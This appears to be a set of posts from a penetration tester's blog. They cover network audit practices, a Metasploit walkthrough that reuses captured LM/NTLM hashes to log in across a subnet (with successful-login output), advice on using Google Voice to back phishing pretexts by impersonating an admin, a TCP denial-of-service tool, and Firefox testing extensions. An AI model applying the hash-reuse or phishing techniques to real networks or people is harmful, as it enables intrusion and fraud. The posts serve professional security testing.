…And now, a rant.

What should be considered (and reported) as a vulnerability when auditing a network?

Is weak network architecture? What if i can hit a critical server from an unprotected workstation? Isn’t that a vulnerability? Can we detect it?

What are today’s vulnerability scanners doing to detect bad management practices? Users w/ local administrator? Admins in the same segment as untrusted contractors? Windows servers / workstations with the same password?

Isn’t that a vulnerability? (hint – pass-the-hash)

What are scanners doing to detect insufficient technical controls? In the face of current (phishing, malware, etc) threats, should lack of egress filtering and lack of a proxy be considered a vulnerability? Should automated tools be picking this up and pointing it out?

so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name       Current Setting  Required  Description
—-       —————  ——–  ———–
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)

To speed it up, set THREADS > 1. Be careful not to set it too high:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO “hosts” (“address”, “name”, “comm”, “os_lang”, “mac”, “os_sp”, “arch”, “os_flavor”, “address6″, “os_name”, “desc”, “created”, “state”) VALUES(‘10.1.1.189′, NULL, ”, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, ‘2009-11-06 10:48:09′, ‘unknown’)

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.

Google Voice turns out to be really handy for phishing attacks. When you send out a phishing email, it’s useful to include a phone number, in case of any issues with the attachment, link or other payload.

Google voice gives you a (new, anonymous) number which you can route wherever you’d like (cell, office, etc). Additionally, you can configure your voicemail to quickly impersonate the local admin, or security officer.

The killer feature, however, is the voicemail recording and transcription. Never again do you have to wade through a voice-driven mail system. Now, it simply dumps into your inbox for easy inclusion into a report. Additionally, you can download, email and share (via unique URI) voice messages.

Good for demonstrating that you can’t trust links AND phone numbers.

The guys from outpost24 are releasing a new tool (sockstress) that exploits problems with TCP state tables. Apparently, you can disable most any windows/linux/firewall box with minimal attack bandwidth (read: cable modem).

According to the podcast,  the tool does “some evil things” during the negotiation of the handshake. It’s definitely not a SYN flood or a SYN cookie.

The attack uses a concept called ‘reverse SYN cookies‘ to encode information about the client’s TCP session in the packets. This allows the attacker to attack without ever keeping track of state. The packets themselves keep track of state and what phase the attack is in.

Approximately 10 packets are needed to disable a single service. No system is known to withstand the attack.

The podcast is the best source of information at this point. (English starts after 5 mins)
More information here:

• http://www.t2.fi/2008/08/27/jack-c-louis-and-robert-e-lee-to-talk-about-new-dos-attack-vectors/
• http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1332898,00.html
• http://www.darkreading.com/blog.asp?blog_sectionid=403&doc_id=164939

This is a dump of my current set of Firefox extensions. Some of these are absolutely critical for pentesting: HackBar, TamperData, FireBug and ModifyHeaders. Some are not so critical, but helpful: Shazou (Geolocation), FormFox (See where forms submit to), PDF Download (yeah.), etc.

Aardvark – aardvark.xpi
Powerful and user-friendly selector utility for selecting elements and doing various actions on them. It can be used for cleaning up a page prior to printing it (by removing and isolating elements), for making the page more readable, and (most appreciated by web developers), for analyzing the structure of a page.

Add N Edit Cookies – add_n_edit_cookies-0.2.1.3-fx+mz.xpi
Cookie Editor that allows you add and edit “session” and saved cookies.

AS Number – asnumber-1.0beta9-fx.xpi
The AS Number Extension displays interesting information the Internet Service Provider of every website visited. Along with it come some additional statistics for those who want to know what happens behind the Webs shiny surface.

Book Burro – bookburro.xpi
An extension for FireFox & Flock web browsers to save you time and money when browsing books.

Cert Viewer Plus – cert_viewer_plus-1.4-fx+tb+sm.xpi
Certificate viewer enhancements: PEM format view, file export

Cookie Monster – cookie_monster-0.94-fx.xpi
Cookie Monster features: – Temporary Permission for sites to leave cookies (permission removed and cookies deleted for site with temporary permission upon restart of Firefox) – New option to set general Firefox setting to block all cookies – Updated menu structure – Menu options to view cookies for current site or all sites – A panel indicating the current status of cookies for the current site and domain appears while hovering over the cookie status indicating icon in the status bar In a nutshell, Cookie Monster allows for easier managing of what sites a user allows to set cookies and what sites cannot. It works best for users who do NOT accept cookies by default, although this is not necessary.

Cookie Safe – cookiesafe-3.0.3-fx+tb+sm.xpi
This extension will allow you to easily control cookie permissions. It will appear on your statusbar. Just click on the icon to allow, block, or temporarily allow the site to set cookies. You can also view or clear the cookies and exceptions by…

Cookie Watcher – cookie_watcher-0.7-fx.xpi
It is a simple extension. It helps testing web applications – it quickly can wipe ’session’ cookie or it helps to identify cluster node in clustered environments using cookie value.

Delicious Bookmarks – delicious_bookmarks-2.0.104-fx.xpi
Delicious Bookmarks is the official Firefox add-on for Delicious, the world’s leading social bookmarking service (formerly del.icio.us). It integrates your bookmarks and tags with Firefox and keeps them in sync for easy, convenient access.

Download Statusbar – download_statusbar-0.9.6.3-fx.xpi
View and manage downloads from a tidy statusbar – without the download window getting in the way of your web browsing.

Edit Cookies – EditCookies.xpi
Edit your cookies right in Firefox!

Extended Cookie Manager – extended_cookie_manager-0.9-fx.xpi
Easier cookie managment for Firefox

FasterFox – Fasterfox{2.0.0}.xpi
Performance and network tweaks for Firefox

FireBug – firebug-1.2.1-fx.xpi
Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.

FireCookie – firecookie-0.6-fx.xpi
Firecookie is an extension for Firebug that makes possible to view and manage cookies in your browser

FlagFox – flagfox-3.3.1-fx.xpi
Displays a country flag depicting the location of the current website’s server and provides quick access to detailed location and webserver information.

FormFox – formfox-1.6.2-fx.xpi
Do you know where your form information is going? This extension displays the form action (the site to which the information you’ve entered is being sent.)

FoxyProxy – foxyproxy-2.8.5-fx.xpi
FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s limited proxying capabilities. It offers more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy, ProxyTex, TorButton, etc.

GreaseMonkey – greasemonkey-0.8.20080609.0-fx.xpi
Allows you to customize the way a webpage displays using small bits of JavaScript. Hundreds of scripts, for a wide variety of popular sites, are already available at http://userscripts.org. You can write your own scripts, too. Check out http://wiki.greasespot.net/ to get started.

HackBar – hackbar-1.3.2-fx.xpi
Simple security audit / Penetration test tool.

HeaderSpy – HeaderSpy{1.2.2}.xpi
Shows HTTP headers on statusbar.

Hide Navigation Bar – hide_navigation_bar-1.2-fx.xpi
This extension enables you to hide the navigation bar through a toggle button. Currently the toggle button is the F2 key. You can change the key in the extensions options, as well as configure whether you want the Navigation Bar to be displayed on an initial Firefox launch. Also allows you to enable an Auto-Hide mode if you wish to use that instead.

HttpFox – httpfox-0.8.2-fx.xpi
An HTTP analyzer addon for Firefox

IETab – ietab-1.5.20080618-addons
This is a great tool for web developers, since you can easily see how your web page displayed in IE with just one click and then switch back to Firefox.

IMacros For Firefox – imacros_for_firefox-6.0.7.5-fx+mz+sm.xpi
Automate Firefox. Record and replay repetitious work. If you love the Firefox web browser, but are tired of repetitive tasks like visiting the same sites every days, filling out forms, and remembering passwords, then iMacros for Firefox is the solution you’ve been dreaming of! ***Whatever you do with Firefox, iMacros can automate it.***

JSView – jsview-2.0.5-fx+sm.xpi
ll browsers include a “View Source” option, but none of them offer the ability to view the source code of external files. Most websites store their javascripts and style sheets in external files and then link to them within a web page’s source code. Previously if you wanted to view the source code of an external javascript/stylesheet you would have to manually look through the source code to find the url and then type that into your browser.rnrnWell now there’s a much easier way.

Live HTTP Headers – live_http_headers-0.14-fx+sm.xpi
View HTTP headers of a page and while browsing.

Live IP Address – live_ip_address-1.82-fx.xpi
Retrieves your Live IP Address and displays it on Firefox’s status bar… Additional features: i) Easy copy of IP address to the clipboard, ii)Set update interval iii) Force update option

LocationBar – Locationbar{0.9.1}.xpi
Puts emphasis on the domain to reduce spoofing risk. Linkifies URL segments (press Ctrl, Meta, Shift or Alt). More URL formatting options configurable.

Modify Headers – modify_headers-0.6.4-fx+mz+sm.xpi
Add, modify and filter http request headers. You can modify the user agent string, add headers to spoof a mobile request (e.g. x-up-calling-line-id) and much more.

NoScript – noscript-1.8.1.3-fx+mz+sm.xpi
The best security you can get in a web browser!
Allow active content to run only from sites you trust, and protect yourself against XSS attacks.

PDF Download – pdf_download-2.0.0.0-fx.xpi
Use PDF Download to do whatever you like with PDF files on the Web. Regain control of them and eliminate browser problems, view PDFs directly in Firefox as HTML, and use the all-new Web-to-PDF toolbar to save and share Web pages as high-quality PDF files.

Poster – poster-1.7.1-fx.xpi
A developer tool for interacting with web services and other web resources that lets you make HTTP requests, set the entity body, and content type. This allows you to interact with web services and inspect the results…

RefControl – refcontrol-0.8.11-fx.xpi
Control what gets sent as the HTTP Referer on a per-site basis.

ReloadEvery – reloadevery-2.0-fx.xpi
Reloads web pages every so many seconds or minutes. The function is accessible via the context menu (menu you get when you right click on a web page) or via a drop down menu on the reload button

Shazou – shazou-2.1-fx.xpi
Finally mapping is integrated with the Firefox browser. The product called Shazou (pronounced Shazoo it is Japanese for mapping) enables the user with one-click to map and geo-locate any website they are currently viewing.

ShowIP – showip-0.8.08r14b0251-fx+mz.xpi
Show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right mouse button) and hostname (left mouse button), like whois, netcraft. Additionally you can copy the IP address to the clipboard.

SQL Inject Me – sqlime-0.2.xpi [Doesn't Work with FF3]
SQL Injection vulnerabilites can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

Tab Mix Plus – tab_mix_plus-dev-build.xpi
Tab Mix Plus enhances Firefox’s tab browsing capabilities. It includes such features as duplicating tabs, controlling tab focus, tab clicking options, undo closed tabs and windows, plus much more. It also includes a full-featured session manager.

TamperData – tamper_data-10.1.0-fx.xpi
Use tamperdata to view and modify HTTP/HTTPS headers and post parameters. Trace and time http response/requests. Security test web applications by modifying POST parameters.

TrashMail.net – trashmail.net-1.0.12-fx.xpi
Create free disposable email addresses and paste them directly in forms. This helps to protect you from spam mails and could be useful when subscribing to forums or newsletters

TwitterFox – twitterfox-1.7-fx.xpi
TwitterFox is a Firefox extension that notifies you of your friends’ statuses of Twitter.

User Agent Switcher – user_agent_switcher-0.6.11-fx+sm.xpi
Adds a menu and a toolbar button to switch the user agent of the browser.

Web Developer Toolbar – web_developer-1.1.6-fx.xpi
Adds a menu and a toolbar with various web developer tools.

XSS Inject Me – xssme-0.2.1.xpi [Doesn't Work with FF3]
Cross-Site Scripting (XSS) is a common flaw found in todays web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS

you can download them all as one big zip here.

I’ve often run into the case of the network that simply can’t be satisfactorily tested in the time allotted to it. There are a couple reasons for this: tight budgets, sales processes that lead to “cookie-cutter” penetest sales, poor scoping, etc.

The typical solution to this is to document what could not be completed or tested fully and present this to the client. This is frustrating to both the pentester (who scoped the work) and the client (who likely expected the work to fully be completed on time).

I’m wondering if there’s a better way to do such work.

What if a pentest could be scheduled to happen over a two/three month period in which the client would be aware the the pentest could happen at any time, but wouldn’t be expecting malicious traffic at any given moment.

There are obvious benefits to such a situation:

• The pentester has a more relaxed schedule to execute an attack.
• The attacks can be more complex, as there is more time to plan.
• The client’s defense can be more accurately tested (as they won’t be fully expecting the attack when it happens).

And obvious drawbacks:

• The client needs to trust the pentester / pentester’s firm that they’re getting a fair share of time / work (A project plan and an unabridged log of work completed would help in this situation).
• Project management would be more difficult. How do you ensure that you, as a tester, are giving adequate attention to a project?
• The client couldn’t be under any time crunch (This happens more often than you would expect).

This could even be taken to the next level by putting a pentester on retainer, and ensuring that the network is fully examined every ~month. This seems the natural way to ensure complete and continuing coverage.

What are your thoughts? Is this a good / bad idea? How would you respond as a network manager? As a pentester?

About Me:
A pentester for a growing vulnerability assessment (product) firm.  My background is in computer science and i have no strict formal education in security. I’ve only recently gotten into the field, though i’ve been fascinated by computers and networks as long as i can remember.

My goals for hexESec are fairly straightforward:
- Keep track of interesting ideas, thoughts, and information in a public forum.
- Promote current work and projects.
- Build and maintain some semblance of a (good) reputation.
- Encourage others to share their ideas.